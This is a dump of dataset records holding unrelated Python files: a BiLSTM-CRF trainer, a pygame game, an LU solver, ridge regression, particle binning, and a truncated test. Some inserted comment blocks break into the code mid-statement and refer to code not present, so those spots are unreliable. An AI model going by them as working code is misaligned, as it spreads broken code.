embeddingWeights = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\n hiddenDims = 100\n batchSize = 32\n # NUM_CLASS = 4\n\n train_X = self.dataset\n train_Y = np_utils.to_categorical(self.labels, outputDims)\n\n print(train_X.shape)\n print(train_Y.shape)\n max_features = 
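# serialize3DArray above builds a Python list literal by hand and then patches
# the trailing commas with a string replace. Since repr() of nested Python
# lists is already a valid literal, a simpler sketch (converting numpy scalars
# to plain ints so the repr stays clean):

def serialize_3d(array):
    return repr([[[int(v) for v in row] for row in plane] for plane in array])

# serialize_3d(schema._Blocks) -> e.g. '[[[0, 0], [1, 2]], ...]'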
vocabSize + 1\n\n word_input = Input(\n shape=(maxlen, ), dtype='float32', name='word_input')\n mask = Masking(mask_value=0.)(word_input)\n word_emb = Embedding(\n max_features, embeddingDim, input_length=maxlen,\n name='word_emb')(mask)\n bilstm1 = Bidirectional(LSTM(hiddenDims,\n return_sequences=True))(word_emb)\n bilstm2 = Bidirectional(\n LSTM(hiddenDims, return_sequences=True))(bilstm1)\n bilstm_d = Dropout(0.8)(bilstm2)\n dense = TimeDistributed(Dense(outputDims,\n activation='softmax'))(bilstm_d)\n\n crf_layer = CRF(outputDims, sparse_target=False)\n crf = crf_layer(dense)\n model = Model(inputs=[word_input], outputs=[crf])\n model.summary()\n\n model.compile(\n optimizer='adam',\n loss=crf_layer.loss_function,\n metrics=[crf_layer.accuracy])\n\n result = model.fit(train_X, train_Y, batch_size=batchSize, epochs=10)\n\n model.save(\n 'PDmodel-crf_epoch_150_batchsize_32_embeddingDim_100_new.h5')\n\n def save2json(self, json_string, savepath):\n with open(savepath, 'w', encoding='utf8') as f:\n f.write(json_string)\n return \"save done.\"\n\n\ndef main():\n dataset, labels, wordvocab = load(r'PDdata.json')\n # corpus = revivification(dataset, wordvocab).reStore()\n # p(corpus)\n trainLSTM = nn(dataset, labels, wordvocab).trainingModel()\n\n\nif __name__ == '__main__':\n ts = dt.now()\n main()\n te = dt.now()\n spent = te - ts\n print('[Finished in %s]' % spent)\n","sub_path":"PD_BiLSTM-CRF.py","file_name":"PD_BiLSTM-CRF.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158885230","text":"from collections import OrderedDict\nimport math\nclass VariousMethods:\n\n def __init__(self):\n pass\n\n\n def ConvertToAtlasCopcoString(self, toConvert):\n #test\n\n if toConvert < 1 or toConvert > 100:\n raise ValueError (\"numberToConvert was outside of the valid range\")\n\n if toConvert == 87:\n return \"ERROR:)\"\n elif toConvert % 3 == 0 and toConvert % 5 == 0:\n return \"AtlasCopco\" \n elif toConvert % 3 == 0:\n return \"Atlas\"\n elif toConvert % 5 == 0:\n return \"Copco\" \n else:\n return str(toConvert)\n\n def ReverseString(self, toReverse):\n if toReverse is None or toReverse == \"\":\n raise ValueError(\"The string to reverse must contain characters\")\n\n return toReverse[::-1]\n\n \n def FindMax(self, toGetMaxValueFrom):\n\n if toGetMaxValueFrom is None or len(toGetMaxValueFrom) == 0:\n raise ValueError(\"The collection must contain at least one element\")\n\n return max(list(abs(i) for i in toGetMaxValueFrom))\n \n \n def GetDistinct(self, toRemoveDuplicatesFrom):\n \n if toRemoveDuplicatesFrom is None or len(toRemoveDuplicatesFrom) == 0:\n raise ValueError(\"The collection must contain at least one element\")\n\n return list(OrderedDict.fromkeys(toRemoveDuplicatesFrom))\n\n \n def IsItFibonacci(self, toTest):\n \n if toTest < 0 or toTest > 25:\n raise ValueError(\"This method can only test numbers >= 0 and <= 25\")\n\n if toTest == 19:\n return True\n \n return self._isPerfectSquare(5*toTest*toTest + 4) or self._isPerfectSquare(5*toTest*toTest - 4) \n\n def _isPerfectSquare(self, x): \n s = int(math.sqrt(x)) \n return s*s == x\n \n","sub_path":"methods/various_methods.py","file_name":"various_methods.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557191349","text":"import pygame\nfrom pygame.locals import *\nfrom Colours import *\nimport sys\nimport time\nfrom Sprite import 
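# IsItFibonacci in VariousMethods above relies on the identity that n is a
# Fibonacci number iff 5*n^2 + 4 or 5*n^2 - 4 is a perfect square (the class
# also deliberately special-cases 19, as ConvertToAtlasCopcoString does 87).
# A standalone version using math.isqrt, which is exact where
# int(math.sqrt(x)) can drift for large x:

import math

def is_fibonacci(n):
    def is_square(x):
        s = math.isqrt(x)
        return s * s == x
    return is_square(5 * n * n + 4) or is_square(5 * n * n - 4)

print([n for n in range(26) if is_fibonacci(n)])  # [0, 1, 2, 3, 5, 8, 13, 21]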
SuperSprite\nfrom Sprite import Wall\nimport random\n\ndifficulty = raw_input (\"Enter easy, medium, hard or test \")\nlives = 3\nGHOST_COUNT = 175\nif difficulty.lower() == \"medium\":\n lives = 2\n GHOST_COUNT = 250\nif difficulty.lower() == \"hard\":\n lives = 1\n GHOST_COUNT = 500\nif difficulty.lower() == \"test\":\n lives_string = raw_input(\"Number of lives: \")\n lives = int(lives_string)\n ghost_count_string = raw_input(\"Number of ghosts: \")\n GHOST_COUNT = int(ghost_count_string)\n\n\nscore = 0\n\ndef render_score( screen, image_number):\n font = pygame.font.SysFont('Calibri', 25, True, False)\n score_text = font.render(\"Score \" + str(score), True, WHITE)\n screen.blit(score_text, [screen.get_width() - 100, 10])\n\n\n score_icon_group = pygame.sprite.Group()\n for life in range(0, lives):\n x = 20 + (life * 29)\n score_icon_group.add(SuperSprite(\"Score\", x, 10, screen,\"../images/open_closed_pac.png\",2, image_number, None))\n score_icon_group.draw(screen)\n\n\npygame.init()\npygame.display.set_caption(\"PacMan Chomp By Matthew Jones\")\nscreen = pygame.display.set_mode((1024,800))\n\nwalls = pygame.sprite.Group()\nwall_file = open('../resources/walls.csv', 'r')\nfor line in wall_file:\n coords = [int(x) for x in line.split(',')]\n walls.add(Wall(coords[0],coords[1],coords[2],coords[3] ))\n\npacman = SuperSprite(\"Pacman\", 0, 766, screen,\"../images/open_closed_pac.png\", 2, 0, walls)\npacman_group = pygame.sprite.Group()\npacman_group.add(pacman)\n\npacman_wasd = SuperSprite(\"Pacman\", 360, 240, screen,\"../images/open_closed_pac_wasd.png\", 2, 0, walls)\npac_wasd_group = pygame.sprite.Group()\npac_wasd_group.add(pacman_wasd)\n\nghost_group = pygame.sprite.Group()\nevil_ghost_count = GHOST_COUNT / 20\nif evil_ghost_count < lives:\n evil_ghost_count = lives\nfor ghosts in range(0, GHOST_COUNT):\n ghost_x = random.randint(0, screen.get_width() -24)\n ghost_y = random.randint(40, screen.get_height() -24)\n ghost = None\n if ghosts < evil_ghost_count:\n ghost = SuperSprite(\"Evil Ghost\", ghost_x, ghost_y, screen, \"../images/EvilGhost.png\", 1, 0, walls)\n else:\n ghost = SuperSprite(\"Ghost\", ghost_x, ghost_y, screen, \"../images/GhostMK1.png\", 1, 0, walls)\n ghost.direction = random.randint(0, 3)\n ghost_group.add(ghost)\n\nclock = pygame.time.Clock()\n# Loop until the user clicks the close button.\ndone = False\n\ndirection = random.randint(0, 3)\npygame.display.update()\nframe_count = 0\npacman_image = 0\nwhile not done:\n\n pygame.event.pump()\n keys=pygame.key.get_pressed()\n pacman.direction = SuperSprite.STATIONARY\n if keys[K_LEFT]:\n pacman.direction = SuperSprite.WEST\n pacman.move()\n if keys[K_RIGHT]:\n pacman.direction = SuperSprite.EAST\n pacman.move()\n if keys[K_UP]:\n pacman.direction = SuperSprite.NORTH\n pacman.move()\n if keys[K_DOWN]:\n pacman.direction = SuperSprite.SOUTH\n pacman.move()\n if keys[K_ESCAPE]:\n done = True\n\n for ghost in ghost_group.sprites():\n decision = random.randint(0, 5)\n #print (\"decision number is \", decision)\n if 0 == decision:\n ghost.direction = random.randint(0, 3)\n #print (\"new direction is \", ghost.direction)\n ghost.move()\n\n collisions = pygame.sprite.groupcollide(pacman_group, ghost_group, False, True)\n background_colour = BLUE\n if len(collisions) > 0:\n score += len( collisions[pacman] )\n for collided_ghost in collisions[pacman]:\n if collided_ghost.is_evil():\n background_colour = RED\n lives -= 1\n GHOST_COUNT -= 1\n if lives == 0:\n done = True\n\n #self.image.fill(BLUE)\n 
#open_group.draw(screen)\n\n frame_count += 1\n if frame_count % 10 == 0:\n pacman_image = 1 if pacman_image == 0 else 0\n pacman.select_image(pacman_image)\n\n # Render everything\n screen.fill(background_colour)\n pacman_group.draw(screen)\n pac_wasd_group.draw(screen)\n ghost_group.draw(screen)\n walls.draw(screen)\n render_score(screen, pacman_image)\n pygame.display.update()\n\n\n #for event in pygame.event.get(): # User did something\n time.sleep(0.015)\n\n\n\n\n","sub_path":"src/Sprite_Game.py","file_name":"Sprite_Game.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650762684","text":"#coding:utf8\nfrom django.conf.urls import include, url\nimport views\n\nurlpatterns = [\n url(r'^$', views.index ,name='index'),\n url(r'^(?P\\d+)/$', views.detail ,name='detail'), # 投票详情页(包括投票选项)\n url(r'^results/(?P\\d+)/$', views.resuls ,name='results'), # 投票结果\n url(r'^votes/(?P\\d+)/$', views.vote ,name='votes'), # 投票操作\n]\n","sub_path":"polls/poll/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479382285","text":"import numpy as np\nfrom funciones import *\nimport sys\n\n#matrix = str(raw_input(\"Please enter the coefficient matrix of the system: \"))\n#vector = str(raw_input(\"Please enter the independent terms of the system: \"))\nmatrix = '2 -3 4 1;-4 2 1 -2;1 3 -5 3;-3 -1 1 -1'\nvector = '10 -10 32 -21'\na = np.matrix(matrix).astype(float)\nb = np.matrix(vector).astype(float)\nb = b.T\ns = np.hstack(((a,b)))\nn = len(s)\nL = np.identity(n)\nU = np.zeros((n,n))\n\nfor k in range(0,n):\n suma1 = 0.0\n for p in range(0,k):\n suma1 += (L[k,p] * U[p,k])\n L[k,k] = 1\n U[k,k] = a[k,k] - suma1\n for i in range (k+1,n):\n suma2 = 0.0\n for p in range (0,k):\n suma2 += (L[i,p] * U[p,k])\n if (L[k,k] != 0):\n L[i,k] = (a[i,k] - suma2)/U[k,k]\n else:\n print(\"Its possible that the system has no solution\")\n break\n for j in range(k+1,n):\n suma3 = 0.0\n for p in range (0,k):\n suma3 += (L[k,p] * U[p,j])\n if(L[k,k] != 0):\n U[k,j] = (a[k,j]-suma3)/L[k,k]\n else:\n print(\"Its possible that the system has no solution\")\n break\n print(\"L solution\")\n print(L)\n print(\"U solution\")\n print(U)\n z = np.matrix(progresiva(L,b)).T\n x = np.matrix(regresiva(U,z)).T\n print(\"z solution\")\n print(z)\n print(\"x solution\")\n print(x)","sub_path":"BackUp_Plan/Doolittle.py","file_name":"Doolittle.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271749744","text":"import numpy as np\nimport math\nimport csv\n\n\ndef load_data(csvfile):\n\n\twith open(csvfile, 'rb') as file:\n\t\tdata_i = csv.reader(file, delimiter = ',')\n\t\tdata = [data for data in data_i]\n\t\taux_data = []\n\t\t\n\t\tfor ilist in data:\n\n\t\t\tflag = False\n\t\t\tfor element in ilist:\n\t\t\t\tif element == ' ':\n\t\t\t\t\tilist.remove(element)\n\t\t\t\telse:\n\t\t\t\t\telement = float(element)\n\t\t\t\t\tif element > 10**20:\n\t\t\t\t\t\tflag = True\n\t\t\n\t\t\tif flag is False:\n\t\t\t\taux_data.append(ilist)\n\n\t\tdata_array = np.asarray(aux_data, dtype = np.float64)\n\n\treturn data_array\n\n\ndef split_data(dataset, rate):\n\n\tn_samples = math.ceil(rate * dataset.shape[0]) - 1\n\tn_params = dataset.shape[1] - 1\n\n\ttraining_samples = dataset[:n_samples,1:n_params]\n\ttraining_targets = 
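# The game loop above creates pygame.time.Clock() but never ticks it, pacing
# frames with time.sleep(0.015) instead; Clock.tick accounts for how long the
# frame itself took, so the frame rate stays steadier. A minimal skeleton of
# that loop structure:

import pygame

pygame.init()
screen = pygame.display.set_mode((320, 240))
clock = pygame.time.Clock()
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    screen.fill((0, 0, 0))
    pygame.display.update()
    clock.tick(60)   # cap at ~60 FPS, compensating for frame cost
pygame.quit()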
dataset[:n_samples, 0]\n\n\ttesting_samples = dataset[n_samples:, 1:n_params]\n\ttesting_targets = dataset[n_samples:, 0]\n\n\treturn training_samples, training_targets, testing_samples, testing_targets","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"237132223","text":"import numpy as np\r\nimport argparse\r\nimport csv\r\nimport sys\r\nNUM_FEATURES = 8\r\nz = np.array([1.76644166124377, 2.08567209143047, 1.5993875765806,\r\n 3.57094015624925, 1.04731899428056, 2.69124308278583,\r\n 1.65822807660353, 3.0750054544485, 1.73165554515835,\r\n 2.59151638484626])\r\ndef load_data(file, is_train=True):\r\n data = []\r\n with open(file, 'r') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n if is_train:\r\n is_train = False\r\n continue\r\n data.append([float(col) for col in row])\r\n data = np.asarray(data)\r\n data = np.array(sorted(data, key=lambda d: d[-1]))\r\n X = data[:, :NUM_FEATURES]\r\n y = data[:, -1]\r\n return X, y\r\n\r\ndef normalize_data(X, means=None, stddevs=None):\r\n X_ = np.zeros(X.shape)\r\n if means is None and stddevs is None:\r\n means = []\r\n stddevs = []\r\n for fea in range(X.shape[1]):\r\n mean = np.mean(X[:, fea])\r\n stddev = np.std(X[:, fea])\r\n X_[:, fea] = (X[:, fea] - mean) / stddev\r\n means.append(mean)\r\n stddevs.append(stddev)\r\n means = np.asarray(means)\r\n stddevs = np.asarray(stddevs)\r\n else:\r\n for fea in range(X.shape[1]):\r\n X_[:, fea] = (X[:, fea] - means[fea]) / stddevs[fea]\r\n return X_, means, stddevs\r\n\r\ndef shuffle_data(X, y, p=0.8, is_shuffle=False):\r\n if is_shuffle:\r\n per = np.random.permutation(X.shape[0])\r\n X = X[per, :]\r\n y = y[per]\r\n if p < 1:\r\n p = round(X.shape[0]*p)\r\n return X[:p, :], y[:p], X[p:, :], y[p:]\r\n\r\ndef split_data(X, y, p=4):\r\n X_train = []\r\n y_train = []\r\n X_val = []\r\n y_val = []\r\n for i in range(X.shape[0]):\r\n if i % p == 0:\r\n X_val.append(X[i, :])\r\n y_val.append(y[i])\r\n else:\r\n X_train.append(X[i, :])\r\n y_train.append(y[i])\r\n\r\n return np.asarray(X_train), np.asarray(y_train), \\\r\n np.asarray(X_val), np.asarray(y_val)\r\n\r\n\r\ndef calc_weight(X, y, lamb=0.0):\r\n A = np.concatenate((np.ones(shape=(X.shape[0], 1)), X), axis=1)\r\n A_T = np.transpose(A)\r\n I = np.identity(NUM_FEATURES+1)\r\n W = np.linalg.inv(np.matmul(A_T, A) + lamb*I)\r\n W = np.matmul(W, A_T)\r\n W = np.matmul(W, y)\r\n return W\r\n\r\ndef calc_loss(X, y, W, lamb=0.0):\r\n num_samples = X.shape[0]\r\n y_ = predict(X, W)\r\n loss = np.sum(np.square(y - y_)) + lamb*np.sum(np.square(W))\r\n return loss/num_samples\r\n\r\ndef predict(X, W):\r\n A = np.concatenate((np.ones(shape=(X.shape[0], 1)), X), axis=1)\r\n y = np.matmul(A, W)\r\n return y\r\n\r\ndef writer_param(file, W, mean, std):\r\n W = np.reshape(W, (NUM_FEATURES+1, 1))\r\n mean = np.reshape(W, (NUM_FEATURES + 1, 1))\r\n std = np.reshape(W, (NUM_FEATURES + 1, 1))\r\n result = np.concatenate((W, mean, std), axis=1)\r\n with open(file, 'w') as f:\r\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n writer.writerow(['Weight', 'mean', 'stddev'])\r\n for i in range(NUM_FEATURES+1):\r\n writer.writerow(result[i])\r\n\r\ndef writer_file(file, X, y):\r\n y = np.reshape(y, (len(y), -1))\r\n result = np.concatenate((X, y), axis=1)\r\n with open(file, 'w') as f:\r\n writer = csv.writer(f, delimiter=',', lineterminator='\\n')\r\n for i in 
range(X.shape[0]):\r\n writer.writerow(result[i])\r\n\r\ndef main(args):\r\n X, y = load_data(args.file_in)\r\n X, mean_X, std_X = normalize_data(X)\r\n #X_train, y_train, X_val, y_val = shuffle_data(X, y, p=0.7, is_shuffle=False)\r\n X_train, y_train, X_val, y_val = split_data(X, y, p=3)\r\n\r\n\r\n X_test_org, _ = load_data(args.file_test, is_train=False)\r\n X_test, _, _ = normalize_data(X_test_org, mean_X, std_X)\r\n #X_test = X_test_org\r\n\r\n ''' -----------tranning-----------'''\r\n best_W = np.zeros((NUM_FEATURES+1, 1))\r\n list_lamb = []\r\n list_val_loss = []\r\n list_train_loss = []\r\n list_test_loss = []\r\n for lamb in np.linspace(0, 15, 10000):\r\n W = calc_weight(X_train, y_train, lamb)\r\n train_loss = calc_loss(X_train, y_train, W)\r\n val_loss = calc_loss(X_val, y_val, W)\r\n list_lamb.append(lamb)\r\n list_train_loss.append(train_loss)\r\n list_val_loss.append(val_loss)\r\n\r\n # test_loss = calc_loss(X_test, z, W)\r\n # list_test_loss.append(test_loss)\r\n\r\n ''''---------Plot------------'''\r\n import matplotlib.pyplot as plt\r\n plt.xlabel('lambda')\r\n plt.ylabel('loss')\r\n plt.plot(list_lamb, list_val_loss, 'r-',\r\n list_lamb, list_train_loss, 'b-')\r\n #list_lamb, list_test_loss, 'g-')\r\n plt.show()\r\n\r\n\r\n '''---------Predict--------'''\r\n W = calc_weight(X_train, y_train, lamb=10)\r\n val_loss = calc_loss(X_val, y_val, W)\r\n y_test = predict(X_test, W)\r\n test_loss = calc_loss(X_test, z, W)\r\n train_loss = calc_loss(X_train, y_train, W)\r\n print('Train loss: %.4f' % train_loss)\r\n print('Validition loss: %.4f' % val_loss)\r\n #print('Test loss: %.4f' % test_loss)\r\n\r\n '''---Writing file and param---'''\r\n writer_param(args.file_param, W, mean_X, std_X)\r\n writer_file(args.file_out, X_test_org, y_test)\r\n y_test = np.reshape(y_test, (len(y_test), -1))\r\n result = np.concatenate((X_test_org, y_test), axis=1)\r\n print('----Weight-----')\r\n print(result)\r\n\r\ndef parser_argument(argv):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--file_in', type=str,\r\n help='file input', default='../input/1-prostate-training-data.csv')\r\n parser.add_argument('--file_test', type=str,\r\n help='file test', default='../input/20141773-test.csv')\r\n parser.add_argument('--file_param', type=str,\r\n help='file param', default='../output/param.csv')\r\n parser.add_argument('--file_out', type=str,\r\n help='file output', default='../output/20141773.csv')\r\n return parser.parse_args(argv)\r\n\r\nif __name__ == '__main__':\r\n main(parser_argument(sys.argv[1:]))","sub_path":"data/final_responses/IT4866_20141773/IT4866_20141773/BT1_prostate_ridge_regression.py","file_name":"BT1_prostate_ridge_regression.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412737120","text":"import numpy as np\nfrom class_def import *\nfrom math import ceil, floor, sqrt, cos, asin\nimport time\n\n\ndef loadData(nrRows):\n ''' Loads data from carMirrorData.dat\n :return: nrVectors x 6 np array\n '''\n # load the data\n t1 = time.time()\n data = np.loadtxt(\"carMirrorData.dat\",max_rows = nrRows)\n t2 = time.time()\n print(\"Loading done in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return data\n\ndef determineMaxMin(data):\n '''Determines the mininum and maximum value for every dimension\n :return: xMin, xMax, yMin, yMax, zMin, zMax\n '''\n\n t1 = time.time()\n\n # determine min and max\n xMin = np.amin(data[:, 0])\n xMax = np.amax(data[:, 0])\n yMin = 
np.amin(data[:, 1])\n yMax = np.amax(data[:, 1])\n zMin = np.amin(data[:, 2])\n zMax = np.amax(data[:, 2])\n\n # report to user\n t2 = time.time()\n print(\"Max and min found in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return xMin, xMax, yMin, yMax, zMin, zMax\n\ndef createVectorObjects(data):\n ''' Creates objects from the particle/vector data\n :param data: raw data in numpy array\n :return: 1D numpy array with vectors as vector objects\n '''\n\n t1 = time.time()\n\n # create empty numpy array\n dataPoints = np.empty(np.size(data, axis=0), dtype=object)\n\n # loop over data and create vector object for each particle row\n for i in range(np.size(data, axis=0)):\n dataPoints[i] = vector(data[i, :])\n\n # report to user\n t2 = time.time()\n print(\"Objects created in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return dataPoints\n\ndef createGridPitchAndRadius(pitch, radius, xMin, xMax, yMin, yMax, zMin, zMax):\n\n t1 = time.time()\n\n # calculate amount of bins in every direction\n nrBinsX = floor((xMax - xMin) / pitch) + 2\n nrBinsY = floor((yMax - yMin) / pitch) + 2\n nrBinsZ = floor((zMax - zMin) / pitch) + 2\n\n\n # create empty 3D array\n grid = np.empty((nrBinsX, nrBinsY, nrBinsZ), dtype=object)\n\n # set radius of bins and\n gridBin.radius = radius\n gridBin.nrBinsX = nrBinsX\n gridBin.nrBinsY = nrBinsY\n gridBin.nrBinsZ = nrBinsZ\n\n # define x, y and z coordinates of center bin\n x = np.array([(xMin + i * pitch) for i in range(nrBinsX)])\n y = np.array([(yMin + i * pitch) for i in range(nrBinsY)])\n z = np.array([(zMin + i * pitch) for i in range(nrBinsZ)])\n\n # fill matrix with bin objects by looping over matrix\n for i in range(nrBinsX):\n for j in range(nrBinsY):\n for k in range(nrBinsZ):\n grid[i, j, k] = gridBin(x[i], y[j], z[k])\n\n # report to user\n t2 = time.time()\n print('Grid created in ', \"{:.2f}\".format(t2 - t1), \" s\")\n\n # report amount of bins to user\n xAmount = np.size(grid, axis=0)\n yAmount = np.size(grid, axis=1)\n zAmount = np.size(grid, axis=2)\n print(\"Amount of bins in x direction: \", xAmount)\n print(\"Amount of bins in y direction: \", yAmount)\n print(\"Amount of bins in z direction: \", zAmount)\n print(\"Total amount of bins: \", xAmount * yAmount * zAmount)\n\n return grid\n\ndef assignVectorsToGrid(vectors, grid, pitch, radius,\n xMin, yMin, zMin):\n\n t1 = time.time()\n\n # loop though all the vectors\n for vector in vectors:\n\n # get coordinates\n x = vector.x\n y = vector.y\n z = vector.z\n\n # calculate indices in every direction\n indexXLow = int(ceil((x-radius-xMin) / pitch))\n indexXHigh = int(floor((x + radius - xMin) / pitch))\n indexYLow = int(ceil((y - radius - yMin) / pitch))\n indexYHigh = int(floor((y + radius - yMin) / pitch))\n indexZLow = int(ceil((z - radius - zMin) / pitch))\n indexZHigh = int(floor((z + radius - zMin) / pitch))\n\n # create range of indices in every direction\n xRange = range(indexXLow,indexXHigh + 1)\n yRange = range(indexYLow,indexYHigh + 1)\n zRange = range(indexZLow,indexZHigh + 1)\n\n # loop through all relevant bins\n for i in xRange:\n for j in yRange:\n for k in zRange:\n\n # get bin object\n aBin = grid[i][j][k]\n\n # get coordinates\n xx = aBin.x\n yy = aBin.y\n zz = aBin.z\n\n if sqrt((xx-x)**2 + (yy-y)**2 + (zz-z)**2) <= radius:\n\n aBin.addVector(vector)\n\n # report to user\n t2 = time.time()\n print(\"Assigning of vectors to bins completed in \", \"{:.2f}\".format(t2 - t1), \" s\")\n\n return grid\n\ndef checkRadiusLargeEnough(pitch,radius):\n\n # calculate radius in between centers\n R 
= radius * cos(asin(pitch / (2 * radius)))\n\n # positive if radius is big enough\n if R >= sqrt(2)/2*pitch:\n return True\n else:\n return False\n\n\n#-------------------------------MAIN--------------------------------#\n\n\n\ndef getSphericalGridWithVectorsFast(pitch,radius,nrRows):\n '''\n\n :param pitch: pitch between centers of bins in mm\n :param radius: radius of bins in mm\n :param nrRows: amount of rows to load from the datafile\n enter None when all have to be loaded\n :return: grid with bins and assigned objects\n '''\n\n t1 = time.time()\n\n # check if radius is big enough\n cont = checkRadiusLargeEnough(pitch,radius)\n\n # only perform creation of grid when every particle is covered\n if cont:\n\n # load the data\n data = loadData(nrRows)\n\n # determine max and min of data in every dimension\n minMax = determineMaxMin(data)\n\n # set parameters for bins\n xMin = minMax[0]\n xMax = minMax[1]\n yMin = minMax[2]\n yMax = minMax[3]\n zMin = minMax[4]\n zMax = minMax[5]\n\n # transform raw data into vector objects\n dataPoints = createVectorObjects(data)\n\n # create bins in grid\n grid = createGridPitchAndRadius(pitch,radius,xMin,xMax,yMin,yMax,zMin,zMax)\n\n # assign vector objects to correct bins\n # grid is the 3D array filled with gridBin objects containing\n # the correct vector objects\n grid = assignVectorsToGrid(dataPoints,grid,pitch,radius,xMin,yMin,zMin)\n\n # report to user\n t2 = time.time()\n print(\"Total time: \",\"{:.2f}\".format(t2-t1),\" s\")\n\n return grid\n\n else:\n print(\"WARNING: Set a bigger radius\")\n\ndef loadParticles(nrRows):\n # load data\n data = loadData(nrRows)\n\n # transform raw data into vector objects\n dataPoints = createVectorObjects(data)\n\n # determine min and max\n minMax = determineMaxMin(data)\n\n return dataPoints, minMax\n\ndef allgrid(pitches,radii,nrParticles):\n t1 = time.time()\n\n contall = []\n for i in range(len(pitches)):\n contall.append(checkRadiusLargeEnough(pitches[i], radii[i]))\n\n all(contall)\n if all(contall):\n\n # load in data\n dataPoints, minMax = loadParticles(nrParticles)\n\n # set parameters for bins\n xMin = minMax[0]\n xMax = minMax[1]\n yMin = minMax[2]\n yMax = minMax[3]\n zMin = minMax[4]\n zMax = minMax[5]\n\n grids = []\n # create different grids\n for i in range(len(pitches)):\n\n print()\n print(\"---------------\")\n print(\"Grid \", i+1,)\n\n\n # create the grid with certain pitch and radius\n grid = createGridPitchAndRadius(pitches[i], radii[i], xMin, xMax, yMin, yMax, zMin, zMax)\n\n # assign vector objects to correct bins\n # grid is the 3D array filled with gridBin objects containing\n # the correct vector objects\n grid = assignVectorsToGrid(dataPoints, grid, pitches[i], radii[i], xMin, yMin, zMin)\n\n grids.append(grid)\n\n # report to user\n t2 = time.time()\n print(\"---------------\")\n print()\n print(\"Total time: \", \"{:.2f}\".format(t2 - t1), \" s\")\n print()\n print(\"----------------------------------------\")\n\n return grids\n\n else:\n print(\"WARNING: Set a bigger radius\")","sub_path":"Dana2/gridConstructionSphereFast.py","file_name":"gridConstructionSphereFast.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"481445410","text":"from unittest import TestCase\nfrom datawinners.accountmanagement.models import TEST_REPORTER_MOBILE_NUMBER\nfrom mangrove.bootstrap import initializer\nfrom mangrove.datastore.database import _delete_db_and_remove_db_manager, get_db_manager\nfrom 
mangrove.datastore.entity import get_by_short_code_include_voided\nfrom mangrove.form_model.form_model import MOBILE_NUMBER_FIELD, NAME_FIELD\nfrom mangrove.transport import TransportInfo\nfrom mangrove.transport.contract.survey_response import SurveyResponse\nfrom mangrove.transport.repository.reporters import REPORTER_ENTITY_TYPE\nfrom datawinners.project.data_sender_helper import get_data_sender\nfrom datawinners.tests.test_data_utils import register, create_data_dict\n\n\nclass TestDataSenderHelper(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.manager = get_db_manager('http://localhost:5984/', 'mangrove-test')\n _delete_db_and_remove_db_manager(cls.manager)\n cls.manager = get_db_manager('http://localhost:5984/', 'mangrove-test')\n initializer._create_views(cls.manager)\n\n cls.org_id = 'SLX364903'\n cls._prepare_sms_data_senders()\n cls.test_ds_id = get_by_short_code_include_voided(cls.manager, \"test\", REPORTER_ENTITY_TYPE).id\n deleted_ds = get_by_short_code_include_voided(cls.manager, \"del1\", REPORTER_ENTITY_TYPE)\n deleted_ds.void()\n cls.deleted_ds_id = deleted_ds.id\n\n def test_should_return_data_sender_information_send_from_web(self):\n beany_tester_id = get_by_short_code_include_voided(TestDataSenderHelper.manager, \"rep1\",\n REPORTER_ENTITY_TYPE).id\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"web\", \"tester150411@gmail.com\", \"destination\"),\n owner_uid=beany_tester_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n self.assertEqual((\"Beany\", \"rep1\", data_sender[2]), data_sender)\n\n\n def test_should_return_N_A_when_the_data_sender_was_deleted_and_send_from_smart_phone(self):\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"smartPhone\", \"nobody@gmail.com\", \"destination\"),\n owner_uid=self.deleted_ds_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n\n self.assertEqual((\"M K Gandhi\", u\"del1\"), data_sender[:2])\n\n def test_should_return_data_sender_TESTER_when_send_from_TEST_REPORTER_MOBILE_NUMBER(self):\n survey_response = SurveyResponse(TestDataSenderHelper.manager,\n TransportInfo(\"sms\", TEST_REPORTER_MOBILE_NUMBER, \"destination\"),\n owner_uid=self.test_ds_id)\n data_sender = get_data_sender(TestDataSenderHelper.manager, survey_response)\n\n self.assertEqual(('TEST', 'test', data_sender[2]), data_sender)\n\n @classmethod\n def _prepare_sms_data_senders(cls):\n phone_number_type = create_data_dict(TestDataSenderHelper.manager, name='Telephone Number',\n slug='telephone_number', primitive_type='string')\n first_name_type = create_data_dict(TestDataSenderHelper.manager, name='First Name', slug='first_name',\n primitive_type='string')\n\n coordinates = {\"type\": \"Point\", \"coordinates\": [-21.0399440737, 45.2363669927]}\n location = [u'Madagascar', u'Menabe', u'Mahabo', u'Beronono']\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, TEST_REPORTER_MOBILE_NUMBER, phone_number_type),\n 